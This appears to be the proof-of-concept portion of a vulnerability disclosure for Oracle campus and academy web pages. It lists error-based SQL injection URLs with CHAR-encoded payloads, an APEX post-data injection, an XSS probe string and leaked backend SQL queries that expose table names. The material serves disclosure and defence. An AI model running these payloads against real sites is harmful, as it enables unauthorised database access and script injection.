Proof of Concept: ================= The sql injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... https://campus.oracle.com/campus/HR/emea1-events-remove3.jsp?select1='+ (select convert(int,CHAR(95)+ CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' https://campus.oracle.com/campus/HR/us-jobdesc.jsp?select2='+ (select convert(int,CHAR(95)+ CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&Submit=Go https://academy.oracle.com/pls/html/wwv_flow.show post data f01=false&f02=ASC&p_flow_id=300&p_flow_step_id=2&p_instance=3793763020344869&p_request=APXWGT&p_ widget_action=COLUMN_ORDER&p_widget_mod=ACTION&p_widget_name=worksheet&x01=1%27%22&x02=9823900149811628 XSS https://campus.oracle.com/campus/HR/cn-profile-direct.jsp?flag='"--> Few Sql queries that can be seen in source page : SELECT class_id,doc_code,to_char(class_date,NVL(wc.date_format,'DD-MON- YYYY')) dates, seats_avail, cl.city, cl.state, customer_sat_flag, deep_link_info, ed_center_id, cl.location_id, cl.location_code,loc_type, spoken_language, course_id, activity_version_id ,class_start_time,class_end_time, class_duration,oat.translation_ attributes audiencetype_attributes, cl.timezone timezone, cl.parent_org_id, cl.territory_code FROM LQ_CLASS_SEARCH cl,OTA_ AUDIENCE_TYPES oat, WDDI_COUNTRY wc ,MAP_URLS mu WHERE doc_code = ( SELECT easi_code FROM COURSES WHERE ID = 'D67020GC20' AND org_id = 1001 ) AND mu.org_id(+) = cl.org_id AND mu.city(+) = cl.city AND mu.state(+) = cl.state AND mu.location_code(+) = cl.location_code AND cl.org_id =1001 AND wc.org_id = cl.org_id AND oat.audience_code = cl.audience_type AND EXISTS ( SELECT 1 FROM WDDI_AUDIENCE_TYPES_MAP watm, WDDI_AUDIENCE_ TYPES wat , OTA_AUDIENCE_TYPES oat, WDDI_OTA_AUDIENCE_MAPS woam WHERE wat.audience_type_id IN (4,4) AND watm.org_id = 1 AND watm.course_id = 'D67020GC20' AND wat.audience_type_id = watm.audience_type_id AND oat.audience_code = cl.audience_type AND woam.ota_audience_id = oat.audience_id AND woam.wddi_audience_id = watm.audience_type_id )ORDER BY cl.class_date,cl.state,cl.city SELECT /*+ FIRST_ROWS PUSH_SUBQ */ WEBREG_COURSE_RESULTSCSS.getSortOrder(c.org_id,c.coursetitle,c.id,c.easi_code,c.short_desc,'',m.promotion_start_ date,m.promotion_end_date,m.promotional,m.popularity), c.id, lowercase, deliverytype, short_desc,ekit_yn FROM COURSES c ,COURSE_METADATA m ,Related_types rt , ( SELECT watm.course_id FROM wddi_audience_types_ map watm, wddi_audience_types wat WHERE wat.audience_type_id IN (4,4) AND watm.org_id = 1 AND wat.audience_type_ id = watm.audience_type_id ) w1 where c.org_id = 1001 AND w1.course_id = c.id AND c.activity_status=2 AND NVL(c.deliverysubtype,0) !=9 AND m.org_id = c.org_id AND m.easi_code = c.easi_code AND rt.deltype_id = c.DELIVERYTYPE ORDER BY 1 , rt.ORDER_ID, WEBREG_COURSE_ RESULTSCSS.getPromotional(m.promotion_start_date,m.promotion_end_date,m.promotional) desc, m.popularity asc, id desc